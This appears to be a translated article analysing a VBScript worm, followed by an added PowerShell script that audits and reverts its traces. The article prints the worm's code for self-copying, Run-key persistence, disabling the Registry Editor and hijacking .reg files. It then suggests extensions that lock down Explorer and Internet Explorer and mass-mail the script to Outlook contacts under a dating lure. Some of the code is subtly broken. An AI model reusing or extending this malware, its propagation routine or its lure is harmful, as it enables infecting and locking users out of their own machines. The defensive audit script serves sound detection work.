VBS script analysis
1. Code analysis:
On Error Resume Next        ' If an error occurs, show no dialog and continue with the next statement
Set fs=CreateObject("Scripting.FileSystemObject") ' Create a FileSystemObject for talking to the operating system; its methods handle the file operations (the registry writes below go through the WScript.Shell object)
Set dir1=fs.GetSpecialFolder(0)    ' Get the location of the %Windows% folder
Set dir2=fs.GetSpecialFolder(1)    ' Get the location of the System32/System folder
Set so=CreateObject("Scripting.FileSystemObject")
dim r    ' Declare a variable
Set r=CreateObject("Wscript.Shell")    ' Create the shell object used for the registry writes
so.GetFile(WScript.ScriptFullName).Copy(dir2&"\Win32system.vbs") ' Copy the virus to the System32/System folder
' The following are the malicious registry modifications
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD" ' Modify the registry: disable the Registry Editor
r.Regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Win32system","Win32system.vbs" ' Modify the registry: make this script run automatically at startup
r.Regwrite "HKLM\Software\CLASSES\.reg\","txtfile" ' Modify the registry: block importing .reg files by re-associating them with the txt file type
Based on the analysis above, the author notes that further functionality could be added to this malicious code; for registry modification, for example:
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD" ' Modify the registry: disable the "Run" menu
r.Regwrite "KCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose",1,"REG_DWORD" ' Modify the registry: disable the "Shut Down" menu
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDrives",63000000,"REG_DWORD" ' Modify the registry: hide all drive letters
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetTaskBar",1,"REG_DWORD" ' Modify the registry: disable the "Taskbar and Start Menu" settings
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu",1,"REG_DWORD" ' Modify the registry: disable the right-click context menu
r.Regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoSetFolders",1,"REG_DWORD" ' Modify the registry: disable the Control Panel
Internet Explorer options can also be maliciously modified:
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserContextMenu",1,"REG_DWORD" ' Modify the registry: disable the right mouse button
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoBrowserOptions",1,"REG_DWORD" ' Modify the registry: disable Internet Options
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoFileOpen",1,"REG_DWORD" ' Modify the registry: disable the "File/Open" menu
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\Advanced",1,"REG_DWORD" ' Modify the registry: prevent changes to the Advanced tab settings
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1,"REG_DWORD" ' Modify the registry: prevent changing the home page (the "Home page" setting is greyed out)
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\SecurityTab",1,"REG_DWORD" ' Modify the registry: prevent changes to the Security tab
r.Regwrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions\NoViewSource",1,"REG_DWORD" ' Modify the registry: disable View Source
……
Automatic propagation by e-mail could also be added:
Set ol=CreateObject("Outlook.Application")    ' Create an Outlook application object used for propagation
On Error Resume Next
For x=1 To 100
Set Mail=ol.CreateItem(0)
=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x)    ' Used to send this VBS virus to the first 100 entries in the address book
Mail.Subject="今晚你来吗?"        ' Mail subject
Mail.Body="朋友你好:您的朋友Rose给您发来了热情的邀请。具体情况请阅读随信附件,祝您好运! 同城约会网"            ' Mail body
Mail.Attachments.Add(dir2&"Win32system.vbs")
Mail.Send
Next
ol.Quit
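From a defender's side, the useful takeaway of the analysis above is the set of host artifacts the script leaves behind: the copy of itself in the System folder, the Run-key persistence entry, the disabled Registry Editor, the hijacked .reg association, and the Explorer and Internet Explorer policy restrictions listed as possible extensions. The following PowerShell script is an added example, not part of the original article: it audits a machine for exactly those indicators and, when run with -Remediate, reverts them. The registry paths, value names and the file name Win32system.vbs are taken from the article; the function name, the parameter and the restored .reg association value "regfile" (the standard Windows ProgID for .reg files) are this example's own assumptions. Run it from an elevated prompt, since HKLM and System32 are involved.

```powershell
# Added example: audit and optionally remediate the indicators of the analysed VBS script.
# Function/parameter names are this example's own; registry paths and the dropped file
# name come from the article.
function Test-Win32systemVbs {
    [CmdletBinding()]
    param([switch]$Remediate)

    $findings = @()

    # 1. Dropped copy of the script in the System folder. A 32-bit wscript.exe on a
    #    64-bit host resolves GetSpecialFolder(1) to SysWOW64, so check both.
    foreach ($dir in 'System32', 'SysWOW64') {
        $dropped = Join-Path $env:SystemRoot "$dir\Win32system.vbs"
        if (Test-Path -LiteralPath $dropped) {
            $findings += "Dropped file: $dropped"
            if ($Remediate) { Remove-Item -LiteralPath $dropped -Force }
        }
    }

    # 2. Autorun persistence under HKLM\...\Run
    $run = 'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
    $runVal = Get-ItemProperty -Path $run -Name 'Win32system' -ErrorAction SilentlyContinue
    if ($runVal) {
        $findings += "Run key: Win32system = $($runVal.Win32system)"
        if ($Remediate) { Remove-ItemProperty -Path $run -Name 'Win32system' }
    }

    # 3. Hijacked .reg association (default value rewritten to 'txtfile')
    $regAssoc = 'HKLM:\Software\Classes\.reg'
    $assoc = (Get-ItemProperty -Path $regAssoc -ErrorAction SilentlyContinue).'(default)'
    if ($assoc -eq 'txtfile') {
        $findings += ".reg association hijacked: (default) = $assoc"
        # 'regfile' is the normal ProgID for .reg files (assumption of this example)
        if ($Remediate) { Set-ItemProperty -Path $regAssoc -Name '(default)' -Value 'regfile' }
    }

    # 4. Policy values the script (and its suggested extensions) set to a non-zero DWORD
    $policies = @(
        @{ Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\System'
           Names = @('DisableRegistryTools') }
        @{ Path = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer'
           Names = @('NoRun','NoClose','NoDrives','NoSetTaskBar','NoViewContextMenu','NoSetFolders') }
        @{ Path = 'HKCU:\Software\Policies\Microsoft\Internet Explorer\Restrictions'
           Names = @('NoBrowserContextMenu','NoBrowserOptions','NoFileOpen','NoViewSource') }
        @{ Path = 'HKCU:\Software\Policies\Microsoft\Internet Explorer\Control Panel'
           Names = @('Advanced','HomePage','SecurityTab') }
    )
    foreach ($p in $policies) {
        if (-not (Test-Path -Path $p.Path)) { continue }
        $props = Get-ItemProperty -Path $p.Path
        foreach ($n in $p.Names) {
            $v = $props.$n
            if ($null -ne $v -and $v -ne 0) {
                $findings += "Policy set: $($p.Path)\$n = $v"
                # Deleting the value returns the setting to 'not configured'
                if ($Remediate) { Remove-ItemProperty -Path $p.Path -Name $n }
            }
        }
    }

    # Returns one line per indicator found; an empty array means the host is clean
    return $findings
}

# Usage (elevated prompt):
#   Test-Win32systemVbs               # report only
#   Test-Win32systemVbs -Remediate    # report and revert each finding
```

The check deliberately treats any non-zero value of the listed policy names as a finding rather than only the value 1, because a legitimate administrator setting these keys through Group Policy would place them under the same paths, so each hit should be reviewed against the organisation's intended policy before -Remediate is used.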
